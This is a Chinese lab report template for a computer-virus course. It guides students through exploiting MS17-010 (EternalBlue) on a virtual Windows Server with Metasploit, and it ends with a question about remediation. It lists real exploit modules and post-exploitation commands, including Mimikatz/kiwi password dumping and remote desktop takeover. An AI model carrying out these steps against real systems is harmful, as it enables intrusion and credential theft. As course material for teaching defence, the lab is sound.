2024年1月27日发(作者:)
实验报告
课程名称:实验名称:组 号:班 级: 计算机病毒与防治
系统漏洞攻击分析
项目
负责人
实验日期
小 组
成 员
一、 实验目的
1、Metasploit的基本使用
2、认识Windows服务器高危漏洞ms17-010
3、使用Metasploit漏洞利用模块攻击windows服务器
二、 实验要求
Windows系统 、vmware15.0、KALIlinux、Server 2008 R2
三、实验内容
靶机:Windows server 2008R2 (IP:192.168.20.40)
攻击机:Kali (IP:192.168.6.50)
工具:nmap(这里主要用于漏洞扫描)、metasploit(msf)
Metasploit,简称msf,是一个几个信息收集,漏洞验证、漏洞利用后渗透模块的渗透测试框架。
1、进入msf
输入msfconsole
2、使用msf模块
使用模块:use 模块名
查看选项:option
设置选项:set 选项值
发起攻击:run 或者 exploit
三、 实验步骤
1、 Windows服务器高危漏洞ms17-010基本情况介绍:(自己核查后,整理输入到此处)
提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议
2、用nmap的漏洞扫描模式,扫描靶机看靶机上是否有ms17-010漏洞
命令: nmap --script=vuln 192.168.20.40
注:进入msf 输入Msfconsole
3、使用msf模块
1) 使用msf搜索ms17-010漏洞
(操作结果截图)
2) 使用辅助模块,检查漏洞是否存在
使用模块:use auxiliary/scanner/smb/smb_ms17_010
(操作截图)
设置选项:set RHOSTS 192.168.6.110
(操作截图)
4、使用攻击模块
使用模块:use exploit/windows/smb/ms17_010_psexec
(操作截图)
查看选项:options
设置选项:set RHOSTS 192.168.6.110
(操作截图)
发起攻击:run 或者 exploit
注:运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
5、使用抓屏命令screenshot对目标系统进行截屏
捕获屏幕
6、上传/下载文件
使用upload 和download两个命令进行上床下载
上传当前目录下的文件
下载靶机C盘下的 文件
(操作结果截图)
7、使用shell命令获取靶机的cmd权限,再使用ipconfig命令查询靶机网络地址信息
(操作结果截图)
8、获取用户密码( 使用load kiwi 命令获取靶机登录用户口令,使用creds_all命令显示用户口令)
(操作结果截图)
9、查询靶机系统信息 (使用sysinfo命令)
(操作结果截图)
10、启用远程桌面,配合上一步获取到的密码登录靶机桌面系统。(使用rdesktop命令)
(操作结果截图)
五、 实验总结及存在的问题
思考一下怎么修复ms17-010漏洞,面对系统漏洞我们应该怎么做?


发布评论